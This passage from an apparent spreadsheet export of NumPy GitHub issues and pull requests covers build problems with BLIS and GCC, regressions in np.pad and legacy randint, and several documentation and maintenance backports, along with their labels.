Python version                                                                                                                                        _x000D_
                                                                                                                                                      _x000D_
3.7.4 (default, Aug  5 2019, 20:17:04)                                                                                                                _x000D_
[GCC 9.1.0]                                                                                                                                           _x000D_
                                                                                                                                                      _x000D_
OS info                                                                                                                                               _x000D_
                                                                                                                                                      _x000D_
Linux-3.10.0-693.el7.x86_64-x86_64-with-centos-7.5.1804-Core                                                                                          _x000D_
                                                                                                                                                      _x000D_
Numpy BLAS/Lapack linkage                                                                                                                             _x000D_
                                                                                                                                                      _x000D_
blis_info:                                                                                                                                            _x000D_
    libraries = ['blis', 'blis']                                                                                                                      _x000D_
    library_dirs = ['/home/sajid/packages/spack/opt/spack/linux-centos7-x86_64/gcc-9.1.0/blis-0.6.0-4nabwbykywmmdbrugpp46y74awliplpp/lib']            _x000D_
    define_macros = [('HAVE_CBLAS', None)]                                                                                                            _x000D_
    include_dirs = ['/home/sajid/packages/spack/opt/spack/linux-centos7-x86_64/gcc-9.1.0/blis-0.6.0-4nabwbykywmmdbrugpp46y74awliplpp/include']        _x000D_
    language = c                                                                                                                                      _x000D_
    runtime_library_dirs = ['/home/sajid/packages/spack/opt/spack/linux-centos7-x86_64/gcc-9.1.0/blis-0.6.0-4nabwbykywmmdbrugpp46y74awliplpp/lib']    _x000D_
blas_opt_info:                                                                                                                                        _x000D_
    libraries = ['blis', 'blis']                                                                                                                      _x000D_
    library_dirs = ['/home/sajid/packages/spack/opt/spack/linux-centos7-x86_64/gcc-9.1.0/blis-0.6.0-4nabwbykywmmdbrugpp46y74awliplpp/lib']            _x000D_
    define_macros = [('HAVE_CBLAS', None)]                                                                                                            _x000D_
    include_dirs = ['/home/sajid/packages/spack/opt/spack/linux-centos7-x86_64/gcc-9.1.0/blis-0.6.0-4nabwbykywmmdbrugpp46y74awliplpp/include']        _x000D_
    language = c                                                                                                                                      _x000D_
    runtime_library_dirs = ['/home/sajid/packages/spack/opt/spack/linux-centos7-x86_64/gcc-9.1.0/blis-0.6.0-4nabwbykywmmdbrugpp46y74awliplpp/lib']    _x000D_
flame_info:                                                                                                                                           _x000D_
  NOT AVAILABLE                                                                                                                                       _x000D_
lapack_opt_info:                                                                                                                                      _x000D_
  NOT AVAILABLE                                                                                                                                       _x000D_
```                                                           _x000D_
                                                                                           _x000D_
PS : I'm not sure if this error is due incorrect build process of numpy or with libflame itself. If this is due to an incorrectly configured libflame, feel free to close this issue. _x000D_
</t>
  </si>
  <si>
    <t>Can't build with libFLAME</t>
  </si>
  <si>
    <t>Name all categories as singular (or adjectives). Also move the fragments_x000D_
into an ``upcoming_changes`` folder to be more discoverable._x000D_
_x000D_
Notes that we format some things as bullet points traditionally (right now_x000D_
towncrier only truly supports bullet point format, but I have a PR to fix_x000D_
that)._x000D_
_x000D_
---_x000D_
_x000D_
Currently towncrier still somewhat malforms things, and the title is not really correctly handled. Also I would prefer to directly create a correct file (removing the need to rename)._x000D_
_x000D_
This change also adds a `highlight` category already. We do not have to use it, but if someone believes their change will be a highlight, it would be possible to add a fragment to make sure it shows up in the draft version. I changed the ``--version`` here, because I want to change it so that the `NumPy` part is is hardcoded, but it will be easier to do that once towncrier moves to have better support there.</t>
  </si>
  <si>
    <t>DOC,MAINT: Move towncrier files and fixup categories</t>
  </si>
  <si>
    <t>['04 - Documentation', '16 - Development', 'component: Documentation']</t>
  </si>
  <si>
    <t xml:space="preserve">This is a followup improvement to #12591._x000D_
_x000D_
The original message included "Mismatch: 33.3%". It's not obvious what this_x000D_
percentage means. This commit changes the text to_x000D_
"Mismatched elements: 1 / 3 (33.3%)"._x000D_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</si>
  <si>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Improve mismatch message of np.testing.assert_array_equal</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: numpy.testing']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
I downloaded a GitHub repo (https://github.com/svakulenk0/tweet2vec_clustering) and tried to run it in the environment described below. But I was getting the ValueError shown in the title of the issue. I would hope to get some help here on how to resolve the issue._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
The environment I tried:_x000D_
python 2.7.16 + (numpy 1.16.3 or numpy 1.13.3 or 1.12.1)_x000D_
python 2.7.13 + (numpy 1.12.1 or numpy 1.11.3)_x000D_
theano 1.0.3, fastcluster (1.1.25 ~ 1.1.21 corresponding to numpy version)_x000D_
in Windows 10 Enterprise 64-bit OS_x000D_
_x000D_
### Reproducing code example:_x000D_
In the downloaded repo, simply run the test_clustering_pipeline.py._x000D_
_x000D_
In the t2v.py_x000D_
```_x000D_
def load_params(path):_x000D_
    """_x000D_
    Load previously saved model_x000D_
    """_x000D_
    params = OrderedDict()_x000D_
_x000D_
    with open(path,'r') as f:_x000D_
        npzfile = np.load(f)_x000D_
        for kk, vv in npzfile.iteritems():_x000D_
            params[kk] = vv_x000D_
_x000D_
    return params_x000D_
```_x000D_
The file that was tried to be loaded was the best_model.npz file in the model folder of the repo._x000D_
_x000D_
### Error message: _x000D_
_x000D_
```_x000D_
======================================================================_x000D_
ERROR: test_clustering_pipeline_cluster (__main__.TestClusteringPipeline)_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "test_clustering_pipeline.py", line 38, in test_clustering_pipeline_cluster_x000D_
    show_results=True, output_path=results_path, distance_threshold=1.6)_x000D_
  File "C:\Temp\t2vd_cluster\clustering_pipeline.py", line 121, in run_pipeline_x000D_
    embeddings = save_embeddings(tweets_path, models_path, embs_path)_x000D_
  File "C:\Temp\t2vd_cluster\tweet2vec\encode_char.py", line 120, in save_embeddings_x000D_
    embeddings = generate_embeddings([outfile, modelpath])_x000D_
  File "C:\Temp\t2vd_cluster\tweet2vec\encode_char.py", line 55, in generate_embeddings_x000D_
    params = load_params('%s/best_model.npz' % model_path)_x000D_
  File "C:\Temp\t2vd_cluster\tweet2vec\t2v.py", line 105, in load_params_x000D_
    for kk, vv in npzfile.iteritems():_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\npyio.py", line 243, in iteritems_x000D_
    yield (f, self[f])_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\npyio.py", line 224, in __getitem___x000D_
    pickle_kwargs=self.pickle_kwargs)_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\format.py", line 664, in read_array_x000D_
    data = _read_bytes(fp, read_size, "array data")_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\format.py", line 811, in _read_bytes_x000D_
    raise ValueError(msg % (error_template, size, len(data)))_x000D_
ValueError: EOF: reading array data, expected 262144 bytes got 5924_x000D_
_x000D_
======================================================================_x000D_
ERROR: test_generate_embeddings (__main__.TestClusteringPipeline)_x000D_
----------------------------------------------------------------------_x000D_
Traceback (most recent call last):_x000D_
  File "test_clustering_pipeline.py", line 23, in test_generate_embeddings_x000D_
    embeddings = generate_embeddings([tweets_path, MODELS_PATH])_x000D_
  File "C:\Temp\t2vd_cluster\tweet2vec\encode_char.py", line 55, in generate_embeddings_x000D_
    params = load_params('%s/best_model.npz' % model_path)_x000D_
  File "C:\Temp\t2vd_cluster\tweet2vec\t2v.py", line 105, in load_params_x000D_
    for kk, vv in npzfile.iteritems():_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\npyio.py", line 243, in iteritems_x000D_
    yield (f, self[f])_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\npyio.py", line 224, in __getitem___x000D_
    pickle_kwargs=self.pickle_kwargs)_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\format.py", line 664, in read_array_x000D_
    data = _read_bytes(fp, read_size, "array data")_x000D_
  File "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Anaconda3_64\envs\t2vd\lib\site-packages\numpy\lib\format.py", line 811, in _read_bytes_x000D_
    raise ValueError(msg % (error_template, size, len(data)))_x000D_
ValueError: EOF: reading array data, expected 262144 bytes got 5924_x000D_
_x000D_
----------------------------------------------------------------------_x000D_
Ran 3 tests in 0.031s_x000D_
_x000D_
FAILED (errors=2)_x000D_
_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>ValueError: EOF: reading array data, expected 262144 bytes got 5924</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14171 ._x000D_
_x000D_
_x000D_
Fancy indexing on read-only subclass makes a read-only copy. This PR avoids using the flags of the original array._x000D_
_x000D_
Fixes #14132_x000D_
_x000D_
* do not use original array flags in fancy indexing_x000D_
_x000D_
* Update numpy/core/tests/test_indexing.py_x000D_
_x000D_
Co-Authored-By: Eric Wieser &lt;wieser.eric@gmail.com&gt;_x000D_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</si>
  <si>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Make advanced indexing result on read-only subclass writeable (#…</t>
  </si>
  <si>
    <t xml:space="preserve">1. Replaced `assert_array_almost_equal` with `assert_allclose` seeing how the use of former is being [discouraged](https://docs.scipy.org/doc/numpy/reference/generated/numpy.testing.assert_array_almost_equal.html)._x000D_
_x000D_
2. Fixed a likely typo: `raise ValueError` -&gt; `raise ValueError()`._x000D_
_x000D_
3. Relaxed `test_fft_with_order` for float32. Default tolerance of `assert_array_almost_equal` was not enough for results produced by `mkl_fft` in single precision, for example._x000D_
_x000D_
The tolerance is now set to be proportional to `np.sqrt(X.size)*np.finfo(X.dtype).eps` based on the following paper._x000D_
_x000D_
Infinity norm round-off error of FFT is shown in_x000D_
G.U. Ramos, "Roundoff Error Analyss of the Fast Fourier Transform,"_x000D_
Mathematics of Computation, vol. 25, no. 116, Oct. 1971, p. 757_x000D_
_x000D_
to be bounded by sqrt(N)*K*eps._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>TST: Clean up of test_pocketfft.py</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">A work-around for Intel C Compiler erroneously incrementing the iterator one extra time when comparing with FP exceptions, such as NAN, leading to failure of the test [test_function_base.py::TestInterp::test_non_finite_any_none](https://github.com/numpy/numpy/blob/master/numpy/lib/tests/test_function_base.py#L2418)._x000D_
_x000D_
Function `binary_search_with_guess` in `numpy/core/src/multiarray/compiled_base.c` uses linear search when the number of points is small. _x000D_
_x000D_
Default compiler optimization level generates machine code that increments the iteration variable one time too many, which does not happen with optimization level 0. _x000D_
_x000D_
The fix is to separate line-search into a separate short inline routine and use pragma to suggest Intel C Compiler to compile it with `-O0`. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Workaround for Intel compiler bug leading to failing test</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', '29 - Intel/Anaconda', 'component: numpy.core']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14190 ._x000D_
_x000D_
Moved the hermitian argument to the correct place in the documentation for svd (list of parameters instead of return values)._x000D_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</si>
  <si>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Fix hermitian argument docs in svd.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', '08 - Backport', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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Fix links in `/.github/CONTRIBUTING.md`.</t>
  </si>
  <si>
    <t xml:space="preserve">MAINT: Fix a docstring typo. </t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">ndarray.clip is already just a wrapper for the ufunc, so there is no need to do type-specific wrapping here any more_x000D_
_x000D_
Fixes gh-14140_x000D_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Backport of #14145 _x000D_
</t>
  </si>
  <si>
    <t>BUG: Remove the broken clip wrapper (Backport)</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>Since 1.17 `numpy.pad()` with `mode="linear_ramp"` seems to not use the array's edge value as the end value, but instead the value range maximum of the array's dtype. This seems to happen only for uint dtypes and only if `end_value &gt; edge_value`._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import sys, numpy as np; print(np.__version__, sys.version)_x000D_
_x000D_
for dtype in ["uint8", "uint16", "uint32",_x000D_
              "int8", "int16", "int32",_x000D_
              "float16", "float32", "float64"]:_x000D_
    arr = np.zeros((1,), dtype=dtype)_x000D_
    arr_pad = np.pad(arr, (3, 0), mode="linear_ramp", end_values=3)_x000D_
    print("%07s: %s" % (dtype, arr_pad))_x000D_
```_x000D_
_x000D_
Output for 1.17:_x000D_
```bash_x000D_
1.17.0 3.7.3 | packaged by conda-forge | (default, Jul  1 2019, 21:52:21) _x000D_
[GCC 7.3.0]_x000D_
  uint8: [  3  87 172   0]_x000D_
 uint16: [    3 21847 43692     0]_x000D_
 uint32: [         3 1431655767 2863311532          0]_x000D_
   int8: [3 2 1 0]_x000D_
  int16: [3 2 1 0]_x000D_
  int32: [3 2 1 0]_x000D_
float16: [3. 2. 1. 0.]_x000D_
float32: [3. 2. 1. 0.]_x000D_
float64: [3. 2. 1. 0.]_x000D_
```_x000D_
_x000D_
Output for 1.16.4 (on a python 2.7 system):_x000D_
```bash_x000D_
('1.16.4', '2.7.15 |Anaconda, Inc.| (default, Oct 23 2018, 18:31:10) \n[GCC 7.3.0]')_x000D_
  uint8: [3 2 1 0]_x000D_
 uint16: [3 2 1 0]_x000D_
 uint32: [3 2 1 0]_x000D_
   int8: [3 2 1 0]_x000D_
  int16: [3 2 1 0]_x000D_
  int32: [3 2 1 0]_x000D_
float16: [3. 2. 1. 0.]_x000D_
float32: [3. 2. 1. 0.]_x000D_
float64: [3. 2. 1. 0.]_x000D_
```_x000D_
_x000D_
### Further Observations_x000D_
_x000D_
Using a 2D array does not fix the issue._x000D_
_x000D_
Using `end_values=(3, 0)` instead of `end_values=3` does not fix the issue._x000D_
_x000D_
However, the issue does not appear in 1.17 so long as the edge value is `&gt;=3`:_x000D_
```python_x000D_
import sys, numpy as np; print(np.__version__, sys.version)_x000D_
_x000D_
for dtype in ["uint8", "uint16", "uint32",_x000D_
              "int8", "int16", "int32",_x000D_
              "float16", "float32", "float64"]:_x000D_
    arr = np.zeros((1,), dtype=dtype)_x000D_
    arr = arr + 3_x000D_
    arr_pad = np.pad(arr, (3, 0), mode="linear_ramp", end_values=(3, 0))_x000D_
    print("%07s: %s" % (dtype, arr_pad))_x000D_
```_x000D_
Output:_x000D_
```bash_x000D_
1.17.0 3.7.3 | packaged by conda-forge | (default, Jul  1 2019, 21:52:21) _x000D_
[GCC 7.3.0]_x000D_
  uint8: [3 3 3 3]_x000D_
 uint16: [3 3 3 3]_x000D_
 uint32: [3 3 3 3]_x000D_
   int8: [3 3 3 3]_x000D_
  int16: [3 3 3 3]_x000D_
  int32: [3 3 3 3]_x000D_
float16: [3. 3. 3. 3.]_x000D_
float32: [3. 3. 3. 3.]_x000D_
float64: [3. 3. 3. 3.]_x000D_
```_x000D_
_x000D_
### Related_x000D_
_x000D_
Maybe this is related to issue #12293?_x000D_
_x000D_
There is also a paragraph in the 1.17 release notes saying:_x000D_
_x000D_
&gt; Additionally, there are some corner cases with behavior changes:_x000D_
&gt; Padding max &lt; min has changed to be more consistent across dtypes, but should not be relied upon._x000D_
_x000D_
This is in a section about changes to `clip`, but maybe it is still somehow related?</t>
  </si>
  <si>
    <t>Unexpected behaviour by numpy.pad() with mode="linear_ramp" and uint dtypes in 1.17</t>
  </si>
  <si>
    <t>Moved the `hermitian` argument to the correct place in the documentation for `svd` (list of parameters instead of return values).</t>
  </si>
  <si>
    <t>DOC: Fix hermitian argument docs in `svd`</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>The legacy `randint` in NumPy 1.17.0 does not reproduce values from previous versions when `low=2**32`. I tested against 1.16.4 and 1.15.4. It does work for other values of `low`; I am showing `2**31` and `2**33` below. Same behavior with seed `1`._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
In [1]: import sys, numpy as np; print(np.__version__, sys.version)             _x000D_
1.17.0 3.6.8 (default, Jan 14 2019, 11:02:34) _x000D_
[GCC 8.0.1 20180414 (experimental) [trunk revision 259383]]_x000D_
_x000D_
In [2]: for exponent in range(31, 34): _x000D_
   ...:     r = np.random.RandomState(0) _x000D_
   ...:     print(exponent, r.randint(2**exponent, size=(3,))) _x000D_
   ...:                                                                         _x000D_
31 [209652396 398764591 924231285]_x000D_
32 [2546248239 3626093760 3684848379]_x000D_
33 [2546248239 7921061056 7979815675]_x000D_
```_x000D_
_x000D_
```python_x000D_
In [1]: import sys, numpy as np; print(np.__version__, sys.version)             _x000D_
1.16.4 3.6.8 (default, Jan 14 2019, 11:02:34) _x000D_
[GCC 8.0.1 20180414 (experimental) [trunk revision 259383]]_x000D_
_x000D_
In [2]: for exponent in range(31, 34): _x000D_
   ...:     r = np.random.RandomState(0) _x000D_
   ...:     print(exponent, r.randint(2**exponent, size=(3,))) _x000D_
   ...:                                                                         _x000D_
31 [209652396 398764591 924231285]_x000D_
32 [2357136044 2546248239 3071714933]_x000D_
33 [2546248239 7921061056 7979815675]_x000D_
```_x000D_
_x000D_
```python_x000D_
In [1]: import sys, numpy as np; print(np.__version__, sys.version)             _x000D_
1.15.4 3.6.8 (default, Jan 14 2019, 11:02:34) _x000D_
[GCC 8.0.1 20180414 (experimental) [trunk revision 259383]]_x000D_
_x000D_
In [2]: for exponent in range(31, 34): _x000D_
   ...:     r = np.random.RandomState(0) _x000D_
   ...:     print(exponent, r.randint(2**exponent, size=(3,))) _x000D_
   ...:                                                                         _x000D_
31 [209652396 398764591 924231285]_x000D_
32 [2357136044 2546248239 3071714933]_x000D_
33 [2546248239 7921061056 7979815675]_x000D_
```</t>
  </si>
  <si>
    <t>Legacy randint with low=2**32 does not reproduce NumPy &lt;1.17 values</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '09 - Backport-Candidate', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to install numpy from source but I'm seeing a lot of C99 errors._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```console_x000D_
$ python -s setup.py --no-user-cfg build_x000D_
$ python -s setup.py --no-user-cfg install --prefix=/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy --single-version-externally-managed --root=/_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
I see hundreds of errors like:_x000D_
```_x000D_
numpy/core/src/npysort/radixsort.c.src: In function 'radixsort_bool':_x000D_
numpy/core/src/npysort/radixsort.c.src:112:5: error: 'for' loop initial declarations are only allowed in C99 mode_x000D_
     for (npy_intp i = 1; i &lt; num; i++) {_x000D_
     ^_x000D_
numpy/core/src/npysort/radixsort.c.src:112:5: note: use option -std=c99 or -std=gnu99 to compile your code_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
- Linux CentOS 7_x000D_
- GCC 4.8.5_x000D_
- Python 3.7.4_x000D_
- Numpy 1.17.0_x000D_
</t>
  </si>
  <si>
    <t>Unable to build numpy with GCC 4.8.5</t>
  </si>
  <si>
    <t xml:space="preserve">DEP: Deprecate `np.alen`_x000D_
_x000D_
Issue: #14155 </t>
  </si>
  <si>
    <t>DEP: Deprecate np.alen</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to build numpy from source with BLIS as my BLAS library. Although it compiles fine, it fails its unit tests because it can't load the library._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
BLIS is built using the following flags:_x000D_
```console_x000D_
$ ./configure --prefix=/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/blis-0.6.0-6hdvnljq54jw5cwmcucrmyfhv5u6ybj2 --enable-threading=none --disable-cblas --enable-blas --enable-shared --enable-static auto_x000D_
```_x000D_
Then, I build numpy using the following `site.cfg`:_x000D_
```_x000D_
[blis]_x000D_
libraries = blis_x000D_
library_dirs = /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/blis-0.6.0-6hdvnljq54jw5cwmcucrmyfhv5u6ybj2/lib_x000D_
rpath = /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/blis-0.6.0-6hdvnljq54jw5cwmcucrmyfhv5u6ybj2/lib_x000D_
include_dirs = /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/blis-0.6.0-6hdvnljq54jw5cwmcucrmyfhv5u6ybj2/include_x000D_
```_x000D_
and the following commands:_x000D_
```console_x000D_
$ export NPY_BLAS_ORDER=blis_x000D_
$ export NPY_LAPACK_ORDER=''_x000D_
$ python -s setup.py --no-user-cfg build_x000D_
$ python -s setup.py --no-user-cfg install --prefix=/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy --single-version-externally-managed --root=/_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
I see the following error message when I try to run the unit tests:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy/lib/python3.7/site-packages/numpy/core/__init__.py", line 17, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy/lib/python3.7/site-packages/numpy/core/multiarray.py", line 14, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy/lib/python3.7/site-packages/numpy/core/overrides.py", line 7, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: dlopen(/Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy/lib/python3.7/site-packages/numpy/core/_multiarray_umath.cpython-37m-darwin.so, 2): Library not loaded: libblis.2.dylib_x000D_
  Referenced from: /Users/Adam/spack/opt/spack/darwin-mojave-x86_64/clang-10.0.1-apple/py-numpy-1.17.0-37xrxjmnbitsruc7alrutzpvdil2xhhy/lib/python3.7/site-packages/numpy/core/_multiarray_umath.cpython-37m-darwin.so_x000D_
  Reason: image not found_x000D_
```_x000D_
There were no obvious problems during building. Here are the build logs and build environment:_x000D_
_x000D_
- [build log](https://github.com/numpy/numpy/files/3459336/spack-build-out.txt)_x000D_
- [build env](https://github.com/numpy/numpy/files/3459337/spack-build-env.txt)_x000D_
_x000D_
It seems to me like RPATH isn't working correctly._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
I'm using:_x000D_
_x000D_
- macOS 10.14.5_x000D_
- Clang 10.0.1_x000D_
- Python 3.7.4_x000D_
- Numpy 1.17.0_x000D_
- Setuptools 41.0.1_x000D_
- BLIS 0.6.0_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Problems building numpy with BLIS </t>
  </si>
  <si>
    <t>Fixes #14132 _x000D_
_x000D_
Fancy indexing on read-only subclass makes a read-only copy. This PR avoids using the flags of the original array.</t>
  </si>
  <si>
    <t>BUG: Make advanced indexing result on read-only subclass writeable</t>
  </si>
  <si>
    <t xml:space="preserve">This NEP proposes the introduction of the `__duckarray__` protocol, as described in high-level by NEP-22 and further discussed in #13831 ._x000D_
_x000D_
We have another idea by @shoyer on how to handle duck array typing through `__array_function__`, as mentioned in https://github.com/numpy/numpy/issues/13831#issuecomment-512960168:_x000D_
_x000D_
&gt; we could consider adding a like argument to duckarray. That would require changing the protocol from the simplified proposal above -- maybe to use __array_function__ instead of a dedicated protocol like __duckarray__? I haven't really thought this through._x000D_
_x000D_
The idea above seems viable, and perhaps more complete as well. That said, I want to either extend this NEP to cover that, or maybe write a separate NEP so we can discuss and judge which one is a better solution. In the meantime, let's start discussing the text here._x000D_
_x000D_
cc @shoyer @rgommers @jakirkham @hameerabbasi @mrocklin </t>
  </si>
  <si>
    <t>NEP: Proposal for __duckarray__ protocol</t>
  </si>
  <si>
    <t xml:space="preserve">I have a simulation that deals with a lot of numpy matrices and arrays. At one point of the simulation, the numbers go towards infinity and then numpy converts them to Inf values, giving me an overflow error. The Inf values mess up the proceeding functions, and I just get out 'NaN' filled matrices. If I import gmpy high precision library, convert the np.float64 -&gt; float-&gt; gmpy.mpfr and then do the calculation and convert the answer back to float, everything works fine. However, this is not really efficient to do, and the final answer from that line comes out to something that the np.float64 dtype could handle, but the intermediate calculations to get to the correct output can't be done by numpy because of the very large numbers. _x000D_
_x000D_
It would be nice if when matrices or arrays are initialized, we could set how to handle overflow errors by defining a backup dtype to use. Example:_x000D_
_x000D_
numpy.zeros((2, 1), dtype=np.float64, overflow=gp.mpfr') &lt;-in this case use use np.float64, but if it's too big, use gp.mpfr with default set to None (use inf)._x000D_
_x000D_
### Reproducing code example _x000D_
_x000D_
(this code is 2000+ lines long and takes 5 hours to run before the error is reproduced so I just am posting the snippet as to how I fixed it):_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import gmpy2 as gp_x000D_
_x000D_
		y = multiply(self.Hct_avg_mod[self.cycle_m - 1], self.C[0:self.c_elem, t - 1])_x000D_
		for x in range(0, len(y)):_x000D_
			z = gp.mpfr(float((y[x]-0.16438)/0.070943))_x000D_
			self.cap_press[x] = float(7.0624 * z**9 + 52.852 * z**8 + 142.78 * z**7 + 149.52 * z**6 + 2.6376 * z**5 - 81.241 * z**4 - 7.5042 * z**3 + 36.224 * z**2 + 27.711 * z + 37.752)_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Feature Request: Compatibility with high precision integer calculations</t>
  </si>
  <si>
    <t xml:space="preserve">Let's see how this goes._x000D_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</si>
  <si>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TST: Add 3.8-dev to travisCI testing.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14144 ._x000D_
_x000D_
Due to an exception being in flight. We shouldn't be reporting errors via print anyway_x000D_
_x000D_
Related to gh-14142_x000D_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</si>
  <si>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Remove stray print that causes a SystemError on python 3.7</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14062 ._x000D_
_x000D_
xref #13990 _x000D_
_x000D_
- Add "." missing from #14028_x000D_
- Documentation build: `make dist` had to be called twice to succeed. Fixed by using `latex-build` and  `html-build` targets that avoid `version-check`, and use them in the `dist` target. See below for more info_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
`$NUMPYVER` was evaluated globally when Makefile was first read. On a clean build, before numpy is built and installed, the variable would be empty. The `dist` target would call the `dist-build` target, which would install numpy, then the `html` target which checks `version-check` and uses the stale value for `$NUMPYVER`. Upon a second call to `make dist`, `$NUMPYVER` would evaluate to the version of numpy produced in the previous call. _x000D_
_x000D_
Rather than mess with getting the stale value updated, it is easier to avoid the check altogether when calling `make dist`_x000D_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</si>
  <si>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BUILD: cleanups and fix (again) 'build dist'</t>
  </si>
  <si>
    <t>['04 - Documentation', '08 - Backport', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14121 ._x000D_
_x000D_
gcd/lcm was added in https://github.com/numpy/numpy/commit/7ab0f15250f5965a1e47e419597ca358e9b31a75_x000D_
_x000D_
I believe it was an oversight to not add the function definitions to npy_math.h, which resulted in an **implicit function declaration** for me which means the result of gcd is truncated to 32 bits (which is correct for the vast majority of results) but not all._x000D_
_x000D_
Luckily the [gcd_overflow test](https://github.com/numpy/numpy/blob/master/numpy/core/tests/test_umath.py#L2480) caught this. Unfortantely I had **-w** on and didn't see the **-Wimplicit-function-declaration** error and the test case result is 2^64 which was truncated to 0 so it took quite a bit of my time to debug. _x000D_
_x000D_
I'm not sure if this should be labelled BLD, ENH, or MAINT. _x000D_
I'm also not sure where in the file you'd like these sorted._x000D_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</si>
  <si>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BLD: Add missing gcd/lcm definitions to npy_math.h</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14143 ._x000D_
_x000D_
Due to implicit conversion to int. Since `total_seconds` returns a python `float`, its easiest to convert to a C float and do the int conversion there_x000D_
_x000D_
Fixes gh-14077_x000D_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</si>
  <si>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 xml:space="preserve">BUG: Fix DeprecationWarning in python 3.8. </t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14144 ._x000D_
_x000D_
Due to an exception being in flight. We shouldn't be reporting errors via print anyway_x000D_
_x000D_
Introduced in 3d730002b1428cce568bcf6fcda0e0df76c5d960, so not a regression._x000D_
_x000D_
Related to gh-14142_x000D_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We shouldn't be reporting errors via print anyway_x000D_
_x000D_
Related to gh-14142_x000D_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</si>
  <si>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 xml:space="preserve">BUG: Remove stray print that causes a SystemError on python 3.7. </t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #14137 _x000D_
_x000D_
Adds `static` keyword to the definition of `avx2_scalef_ps` to allow `numpy` to be importable when compiled with `-O0` per suggestion of @r-devulap </t>
  </si>
  <si>
